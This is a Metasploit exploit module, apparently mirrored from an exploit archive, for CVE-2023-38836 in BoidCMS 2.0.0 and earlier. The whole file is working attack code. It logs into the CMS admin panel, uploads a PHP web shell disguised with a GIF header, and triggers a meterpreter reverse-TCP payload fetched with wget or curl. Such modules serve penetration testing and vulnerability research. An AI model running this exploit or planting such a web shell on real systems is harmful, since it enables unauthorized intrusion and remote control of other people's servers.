Share
## https://sploitus.com/exploit?id=PACKETSTORM:177379
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
#  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::FileDropper  
prepend Exploit::Remote::AutoCheck  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'BoidCMS Command Injection',  
'Description' => %q{  
This module leverages CVE-2023-38836, an improper sanitization bug in BoidCMS version 2.0.0  
and below. BoidCMS allows the authenticated upload of a php file as media if the file has  
the GIF header, even if the file is a php file.  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'1337kid', # Discovery  
'bwatters-r7' # Metasploit Module  
],  
'References' => [  
[ 'CVE', '2023-38836' ],  
[ 'URL', 'https://github.com/1337kid/CVE-2023-38836']  
],  
'Privileged' => false,  
'Arch' => ARCH_CMD,  
'Targets' => [  
[  
'nix Command',  
{  
'Platform' => ['linux', 'unix', 'python'],  
'DefaultOptions' => {  
'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',  
'FETCH_COMMAND' => 'WGET',  
'FETCH_WRITABLE_DIR' => '/tmp'  
}  
}  
],  
[  
'Windows Command',  
{  
'Platform' => ['windows', 'python'],  
'DefaultOptions' => {  
'PAYLOAD' => 'cmd/windows/http/x64/meterpreter_reverse_tcp',  
'FETCH_WRITABLE_DIR' => '%TEMP%',  
'FETCH_COMMAND' => 'CURL'  
}  
}  
]  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => '2023-07-13',  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]  
}  
)  
)  
  
register_options([  
OptString.new('TARGETURI', [true, 'The path', '']),  
OptString.new('CMS_USERNAME', [true, 'Username', 'admin']),  
OptString.new('CMS_PASSWORD', [true, 'Password', 'password']),  
OptString.new('PHP_FILENAME', [true, 'The name for the php file to upload', "#{Rex::Text.rand_text_alphanumeric(5..11)}.php"])  
  
])  
@token = nil  
@shell_filename = nil  
end  
  
def check  
res = send_request_cgi(  
'uri' => normalize_uri(target_uri.path, 'admin'),  
'keep_cookies' => true,  
'method' => 'GET'  
)  
if res && res.code == 200  
title = res.get_html_document.xpath('//title').first.to_s  
return Exploit::CheckCode::Detected('Detected BoidCMS, but the version is unknown.') if title.include?('BoidCMS')  
end  
return Exploit::CheckCode::Safe('Unable to retrieve BoidCMS title page')  
end  
  
def extract_token(res)  
token = nil  
if res && res.code == 200  
token = res.get_html_document.xpath("//input[@name='token']/@value").first  
end  
token  
end  
  
def cms_token  
# initial login  
return @token unless @token.nil?  
  
vprint_status('Getting Token')  
res = send_request_cgi(  
'uri' => normalize_uri(target_uri.path, 'admin'),  
'keep_cookies' => true,  
'method' => 'GET'  
)  
@token = extract_token(res)  
end  
  
def cms_login?(login_token)  
vprint_status('Logging into CMS')  
cms_password = datastore['CMS_PASSWORD']  
cms_username = datastore['CMS_USERNAME']  
vars_form_data =  
[  
{  
'name' => 'username',  
'data' => cms_username  
},  
{  
'name' => 'password',  
'data' => cms_password  
},  
{  
'name' => 'login',  
'data' => 'Login'  
},  
{  
'name' => 'token',  
'data' => login_token.to_s  
}  
]  
res = send_request_cgi(  
'uri' => normalize_uri(target_uri.path, 'admin'),  
'method' => 'POST',  
'keep_cookies' => true,  
'vars_form_data' => vars_form_data  
)  
res && res.code == 302  
end  
  
def upload_php?(login_token, shell_filename)  
vprint_status("Uploading PHP file #{shell_filename}")  
vars_form_data =  
[  
{  
'name' => 'file',  
'data' => 'GIF89a;\n<?php system($_GET["cmd"]) ?>',  
'filename' => shell_filename  
},  
{  
'name' => 'token',  
'data' => login_token.to_s  
},  
{  
'name' => 'upload',  
'data' => 'Upload'  
}  
]  
  
res = send_request_cgi(  
'uri' => normalize_uri(target_uri.path, 'admin'),  
'method' => 'POST',  
'keep_cookies' => true,  
'vars_get' => {  
'page' => 'media'  
},  
'vars_form_data' => vars_form_data  
)  
res && res.code == 302  
end  
  
def launch_payload(shell_filename, payload_cmd)  
# send the command to the php page  
vprint_status('launching Payload')  
send_request_cgi(  
'uri' => normalize_uri(target_uri.path, "/media/#{shell_filename}"),  
'method' => 'GET',  
'keep_cookies' => true,  
'vars_get' =>  
{  
'cmd' => payload_cmd  
}  
)  
end  
  
def exploit  
@shell_filename = datastore['PHP_FILENAME']  
login_token = cms_token  
  
fail_with(Failure::UnexpectedReply, 'Failed to retrieve token for login') if login_token.nil?  
fail_with(Failure::UnexpectedReply, 'Failed to log in') unless cms_login?(login_token)  
if upload_php?(login_token, @shell_filename)  
register_file_for_cleanup @shell_filename  
launch_payload(@shell_filename, payload.encoded)  
else  
fail_with(Failure::UnexpectedReply, 'Failed to upload php files')  
end  
end  
  
end